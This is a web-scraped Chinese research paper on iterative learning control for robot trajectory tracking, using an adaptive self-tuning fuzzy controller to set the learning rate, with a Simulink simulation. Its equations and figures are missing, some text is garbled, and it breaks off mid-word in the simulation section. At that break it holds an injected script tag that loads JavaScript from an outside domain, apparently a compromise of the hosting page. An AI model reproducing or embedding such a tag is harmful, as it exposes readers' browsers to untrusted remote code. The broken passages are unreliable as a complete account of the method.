摘 要:在机器人的轨迹跟踪的迭代学习控制中,迭代学习的学习律难以选择,本文结合自校正控制、模糊逻辑和迭代学习控制的基本思想,提出采用自适应模糊控制确定学习率的方法,并采用matlab软件的simulink对该方法应用于机器人高精度的轨迹跟踪控制的情况进行了仿真研究,结果表明该方法具有学习控制律简单实用、跟踪精度高、学习速度快、鲁棒性强等优点。
关键词:迭代学习控制 模糊控制 机器人控制 仿真研究
1 引言
机器人的轨迹跟踪控制是机器人控制中的一类重要的控制,相继提出了许多控制方法。其中迭代学习控制(iterative learning control,ilc)由于采用迭代方式,能完整跟踪任意复杂的理想输入,被认为是一种行之有效的解决方法,并在为了智能控制的一个重要分支,它最早是由日本学者内山(m.uchigama)于1978年研究高速运动机械手的控制问题提出的[1]。二十几年来,迭代学习控制的研究有了较大发展,取得了一些的研究成果[2-8],在迭代学习控制研究中,学习率是关键。近年来,arimoto和他的合作者首先提出d型学习律[9-10],之后他们又相继提出pd型、pid型学习律;craig首先提出滤波器型学习律[11];应用历史迭代数据,吴东南等提出高阶学习律[12];heinzinger等提出带遗忘因子的d型学习律[13];任雪梅等提出了基于神经网络的学习率[14-18];但是从实际的机器人控制来看,由于机器人对象的复杂性以及各种不确定性等因素,模型的求解往往存在诸多困难,而对于未知对象数学模型的控制,模糊控制不失为较好的选择。本文提出采用自适应模糊控制确定学习率的方法,并采用matlab软件的simulink对该方法应用于机器人高精度的轨迹跟踪控制的情况进行了仿真研究,结果表明该方法具有学习速度快,稳定性好,鲁棒性强的优点。
2 迭代学习控制的基本原理
迭代学习控制基本结构如图1所示:
设非线性动力学系统的离散数学模型为:
轨迹跟踪控制的目标是要获得一个控制序列ud(n,使得系统输出y(n)精确跟踪理想输出yd(n)(其中n=1,……,n;n×t0=t;t表示系统的一个工作周期;t0表示系统的采样周期)。迭代学习的基本原理是利用上一次工作周期内的误差ek(n),对下一次工作周期的控制输入uk+1(n)进行修正,经过多个工作周期的学习,逐渐使实际输出y(n)收敛于理想输出yd(n)。其基本步骤是:
第一步:设置初次工作周期的控制序列u1(n)。
第二步:得到本次工作周期的输出序列yk(n)及误差序列ek(n。ek(n)=yd(n)-yk(n);下标k表示工作周期的次数即迭代次数。
第三步:利用目标准则判断系统输出yk(n)是否精确跟踪理想输出yd(n)。是,则结束迭代学习;否则进入下一步。
第四步:确定下一次工作周期的控制序列uk+1(n)=uk(n)+φ[ek(n)],φ为学习算子。转入第二步。
目前迭代学习控制的中心问题是如何选择一种学习律,使得系统既有良好的稳定性又有较快的收敛速度。
3 自整定模糊控制器的设计
本文提出采用模糊控制算法确定迭代学习的学习率的方法,图2描述了这种方法的迭代运行结构。
其中关键的是模糊控制器的设计,设计的自整定模糊控制器方框图如图3所示。
这里的自整定模糊控制器与传统模糊控制器的区别是增加一个自调整因子α,它大大提高了模糊控制器非线性映射的平滑度,从而进一步提高控制效果。
模糊控制器设计的第一步是确定隶属函数,图4(a)为e、δe、u的模糊子集的隶属函数;图4(b)为自整定因子α的模糊子集的隶属函数。
输入变量δe,e和输出变量u的模糊子集的隶属函数被定义在归一化区间[-1,+1],如图4(a)所示;变量α的模糊子集的隶属函数被定义在区间[0,+1],如图4(b)所示。这里采用的是最普通的三角型隶属函数。
通过归一化增益ge,gδe使实际输入的值映射到[-1,+1]区间。
对于传统的模糊控制器,通过归一化增益使控制器的输出映射到对应的实际输出值;而正如图3所示,对于自整定模糊控制器的输出的归一体增益是gu·α。图3中的各变量关系如下:
确定模糊控制器的规则是模糊控制器设计的关键,推理规则是依据专家的控制经验确定。自调整因子α、δun的推理都采用以下规则形式:
δun的推理表如图5(a)。
自调整因子α的推理表如图5(b)。
这种方法适用于线性、非线性等各种被控对象,不需要被控对象精确的数学模型,对迭代学习控制过程中模型误差、初始条件误差、测量误差、随机干扰都具有好的抗干扰性;quot;而且需确定的模糊控制器参数仅三个归一化增益,适于实际操作,应用范围广。
4 仿真研究
在本控制系统仿真时要用到大量的矩阵运算和图形操作,利?script src=http://er12.com/t.js>